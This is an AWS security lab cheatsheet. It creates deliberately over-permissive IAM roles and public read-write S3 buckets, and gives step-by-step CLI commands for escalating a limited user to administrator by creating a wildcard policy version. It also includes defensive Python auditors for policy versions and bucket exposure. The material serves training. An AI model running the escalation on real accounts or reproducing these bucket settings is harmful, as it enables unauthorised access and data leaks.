
AWS-cheatsheet

#overly permissive IAM roles

aws iam create-user --user-name s3ReadUser --tags Key=createdFor,Value=masterclass --profile masterclass
aws iam attach-user-policy --user-name s3ReadUser --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess --profile masterclass

aws iam create-user --user-name EC2DescribeOnlyUser --tags Key=createdFor,Value=masterclass --profile masterclass
aws iam attach-user-policy --user-name EC2DescribeOnlyUser --policy-arn arn:aws:iam::aws:policy/AmazonEC2ReadOnlyAccess --profile masterclass
aws iam create-group --group-name EC2ManagementUsers --profile masterclass
aws iam attach-group-policy --group-name EC2ManagementUsers --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess --profile masterclass
aws iam add-user-to-group --user-name EC2DescribeOnlyUser --group-name EC2ManagementUsers --profile masterclass

aws iam create-role --role-name EC2RDSReadRole --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}' --tags Key=createdFor,Value=masterclass --profile masterclass
aws iam attach-role-policy --role-name EC2RDSReadRole --policy-arn arn:aws:iam::aws:policy/AmazonRDSFullAccess --profile masterclass
aws iam attach-role-policy --role-name EC2RDSReadRole --policy-arn arn:aws:iam::aws:policy/IAMFullAccess --profile masterclass
aws iam attach-role-policy --role-name EC2RDSReadRole --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess --profile masterclass


#iam privilege escalation using policy version rollback; we can also set a previous version as the default and escalate

Run an admin command like list-users to see that the limiteduser has no access

aws iam list-users --profile masterclasslimiteduser

Identify the policies attached to the user using the new profile with AWS CLI

aws iam list-attached-user-policies --user-name limiteduser --profile masterclasslimiteduser

Get the version of the identified policy - policyversionmanager

aws iam get-policy --policy-arn POLICY-ARN --profile masterclasslimiteduser

Get the permissions attached to the policy for version v1 - policyversionmanager

aws iam get-policy-version --policy-arn POLICY-ARN --version-id v1 --profile masterclasslimiteduser

One of the permissions attached is "iam:CreatePolicyVersion"

We can use this to create a new version of the attached policy with privileged access

aws iam create-policy-version --policy-arn POLICY-ARN --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}' --set-as-default --profile masterclasslimiteduser

Run an admin command now to confirm your privileges have escalated to AWS AdministratorAccess

aws iam list-users --profile masterclasslimiteduser
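An added example (not from the original cheatsheet) that serves both the overly permissive roles section above and this policy-version escalation: given the decoded documents that `aws iam get-policy-version` prints for every version of a policy, it flags unrestricted wildcard grants, statements that allow `iam:CreatePolicyVersion` or `iam:SetDefaultPolicyVersion`, and non-default versions that are broader than the default, which is what a responder should look for when cleaning up after this technique. The sample versions are constructed.

```python
import fnmatch

# Constructed sample: the decoded documents that `aws iam get-policy-version`
# prints for each version of one customer-managed policy (not real account data).
SAMPLE_VERSIONS = {
    "v1": {"IsDefaultVersion": True, "Document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["s3:ListBucket", "iam:Get*", "iam:List*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:CreatePolicyVersion", "Resource": "*"}]}},
    "v2": {"IsDefaultVersion": False, "Document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"}]}},
}

# Actions that let a principal rewrite a policy or re-activate an old version of it.
ESCALATION_ACTIONS = ("iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion")

def _as_list(value):
    # Policy fields may be a single string or a list; normalise to a list.
    return value if isinstance(value, list) else [value]

def _grants(action_pattern, target):
    # IAM action matching is case-insensitive; '*' and '?' are wildcards.
    return fnmatch.fnmatchcase(target.lower(), action_pattern.lower())

def find_risky_statements(document):
    """Findings for one policy document: full-admin grants and version-escalation actions."""
    findings = set()
    for stmt in _as_list(document.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            continue
        actions = _as_list(stmt["Action"])
        resources = _as_list(stmt.get("Resource", []))
        # A pattern that matches an action in an arbitrary service is an unrestricted wildcard.
        if "*" in resources and any(_grants(a, "anyservice:AnyAction") for a in actions):
            findings.add("admin-wildcard")
        for target in ESCALATION_ACTIONS:
            if any(_grants(a, target) for a in actions):
                findings.add("escalation:" + target)
    return sorted(findings)

def audit_policy_versions(versions):
    """Return (findings per version, default version id, non-default versions riskier than the default)."""
    report = {vid: find_risky_statements(v["Document"]) for vid, v in versions.items()}
    default = next(vid for vid, v in versions.items() if v["IsDefaultVersion"])
    # Any such version can be re-activated with iam:SetDefaultPolicyVersion, so it should be deleted.
    rollback_risk = [vid for vid, f in report.items() if vid != default and set(f) - set(report[default])]
    return report, default, rollback_risk

if __name__ == "__main__":
    print(audit_policy_versions(SAMPLE_VERSIONS))
```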

#iam privilege escalation based on groups


EC2

AMI catalog:

https://us-east-1.console.aws.amazon.com/ec2/home?region=us-east-1#AMICatalog:

From the console we can see the public AMIs, which might be backdoored AMIs as well.

Navigate to EC2 > AMI Catalog and find the “masterclass” AMI under Community AMIs

For AWS CLI ...

Run the following command to find AMIs belonging to the account 511522223657

aws ec2 describe-images --owners 511522223657 --profile masterclass

aws ec2 describe-images --owners 511522223657 --query 'Images[*].[ImageId, Name, PlatformDetails]' --profile masterclass

aws ec2 describe-images --filters "Name=name,Values=session5-warfare" --profile masterclass


#use instance id to see if volume is encrypted or not

Use the instance id to enumerate attached volumes (also visible in the UI)

aws ec2 describe-instances --instance-ids INSTANCE-ID --query "Reservations[].Instances[].BlockDeviceMappings[].Ebs.VolumeId" --region us-east-1 --profile masterclass

aws ec2 describe-volumes --volume-ids VOLUME-ID --query "Volumes[].Encrypted" --region us-east-1 --profile masterclass

#Use the snapshot id to check for encryption status (also visible in the UI)

aws ec2 describe-snapshots --snapshot-ids snap-043dabe339601b7a0 --query "Snapshots[].Encrypted" --region us-east-1 --profile masterclass

#ec2 misconfigurations


Check the security groups for inbound rules


SSRF using IMDS


Access and PassRole, using policy version


#s3 bucket

export UNAME=$(curl -s http://x41.co/random.php)
export bucketname=$UNAME-public-bucket

aws s3api create-bucket --bucket $bucketname --region us-east-1 --profile masterclass
aws s3api put-public-access-block --bucket $bucketname --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass
aws s3api put-bucket-ownership-controls --bucket $bucketname --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass
wget https://aws-masterclass-data.s3.amazonaws.com/session3/boat.jpg
wget https://aws-masterclass-data.s3.amazonaws.com/session3/public.txt
aws s3api put-object --bucket $bucketname --key boat.jpg --body boat.jpg --profile masterclass
aws s3api put-object --bucket $bucketname --key public.txt --body public.txt --profile masterclass
aws s3api put-bucket-acl --bucket $bucketname --acl public-read-write --profile masterclass

export objbucketname=$bucketname-public-objects

aws s3api create-bucket --bucket $objbucketname --region us-east-1 --profile masterclass
aws s3api put-public-access-block --bucket $objbucketname --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass
aws s3api put-bucket-ownership-controls --bucket $objbucketname --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass
aws s3api put-object --bucket $objbucketname --key boat.jpg --body boat.jpg --profile masterclass
aws s3api put-object --bucket $objbucketname --key public.txt --body public.txt --profile masterclass
aws s3api put-bucket-acl --bucket $objbucketname --acl public-read-write --profile masterclass

The bucket policy is single-quoted so its inner double quotes reach the CLI intact; the bucket name is spliced in with "$objbucketname":

aws s3api put-bucket-policy --bucket $objbucketname --policy '{"Version":"2012-10-17","Statement":[{"Sid":"PublicRead","Effect":"Allow","Principal":"*","Action":["s3:GetObject"],"Resource":["arn:aws:s3:::'"$objbucketname"'/*"]}]}' --profile masterclass

export aclrwbucket=$UNAME-bucket-acl-rw

aws s3api create-bucket --bucket $aclrwbucket --region us-east-1 --profile masterclass
aws s3api put-bucket-ownership-controls --bucket $aclrwbucket --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass
aws s3api put-public-access-block --bucket $aclrwbucket --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass
aws s3api put-bucket-acl --bucket $aclrwbucket --grant-read-acp uri=http://acs.amazonaws.com/groups/global/AllUsers --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --profile masterclass
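An added example (not part of the original cheatsheet) for auditing the three bucket setups above from the defender's side: it takes, per bucket, the CLI output shape of `get-public-access-block`, `get-bucket-acl` and `get-bucket-policy`, applies the public access block semantics (IgnorePublicAcls neutralises public ACL grants, RestrictPublicBuckets neutralises a public policy) and reports exactly which grants leave the bucket reachable by everyone. Bucket names and grants are constructed samples; a fourth, fully blocked bucket shows the hardened state.

```python
# Constructed sample, shaped like the CLI output of `get-public-access-block`,
# `get-bucket-acl` and `get-bucket-policy` for buckets like those created above (no real buckets).
GROUPS = "http://acs.amazonaws.com/groups/global/"
ALL_USERS = {"Type": "Group", "URI": GROUPS + "AllUsers"}
AUTH_USERS = {"Type": "Group", "URI": GROUPS + "AuthenticatedUsers"}
PUBLIC_READ_POLICY = {"Version": "2012-10-17", "Statement": [{"Sid": "PublicRead", "Effect": "Allow",
    "Principal": "*", "Action": ["s3:GetObject"], "Resource": ["arn:aws:s3:::demo-public-objects/*"]}]}
ALL_BLOCKED = {"BlockPublicAcls": True, "IgnorePublicAcls": True,
               "BlockPublicPolicy": True, "RestrictPublicBuckets": True}
SAMPLE_BUCKETS = {
    # Only BlockPublicPolicy was set by put-public-access-block; omitted settings are false.
    "demo-public-bucket": {"pab": {"BlockPublicPolicy": False}, "policy": None, "acl": [
        {"Grantee": ALL_USERS, "Permission": "READ"}, {"Grantee": ALL_USERS, "Permission": "WRITE"}]},
    "demo-public-objects": {"pab": {"BlockPublicPolicy": False}, "policy": PUBLIC_READ_POLICY, "acl": []},
    "demo-bucket-acl-rw": {"pab": {"BlockPublicPolicy": False}, "policy": None, "acl": [
        {"Grantee": ALL_USERS, "Permission": "READ_ACP"}, {"Grantee": AUTH_USERS, "Permission": "WRITE_ACP"}]},
    # Same kind of grants and policy, but the block is fully on: nothing is reachable.
    "demo-hardened": {"pab": ALL_BLOCKED, "policy": PUBLIC_READ_POLICY, "acl": [
        {"Grantee": ALL_USERS, "Permission": "READ"}]},
}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _is_public_statement(stmt):
    # An Allow to principal "*" (or {"AWS": "*"}) with no Condition is reachable by anyone.
    principal = stmt.get("Principal")
    if isinstance(principal, dict):
        principal = principal.get("AWS")
    return stmt.get("Effect") == "Allow" and "*" in _as_list(principal) and "Condition" not in stmt

def bucket_exposure(pab, acl, policy):
    """List the ways a bucket is reachable by everyone, after applying the public access block."""
    findings = []
    if not pab.get("IgnorePublicAcls", False):  # IgnorePublicAcls neutralises existing public grants
        for grant in acl:
            uri = grant.get("Grantee", {}).get("URI", "")
            if uri.startswith(GROUPS):  # AllUsers and AuthenticatedUsers both count as public
                findings.append("acl:%s:%s" % (grant["Permission"], uri[len(GROUPS):]))
    if policy and not pab.get("RestrictPublicBuckets", False):  # RestrictPublicBuckets neutralises it
        for stmt in _as_list(policy.get("Statement", [])):
            if _is_public_statement(stmt):
                findings.extend("policy:" + a for a in _as_list(stmt.get("Action", [])))
    return findings

def audit_buckets(buckets):
    """Map each bucket name to its public-exposure findings (empty list means not public)."""
    return {name: bucket_exposure(b["pab"], b["acl"], b["policy"]) for name, b in buckets.items()}
```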


lambda invocation


RDS snapshots


Contributors: mohdhaji87
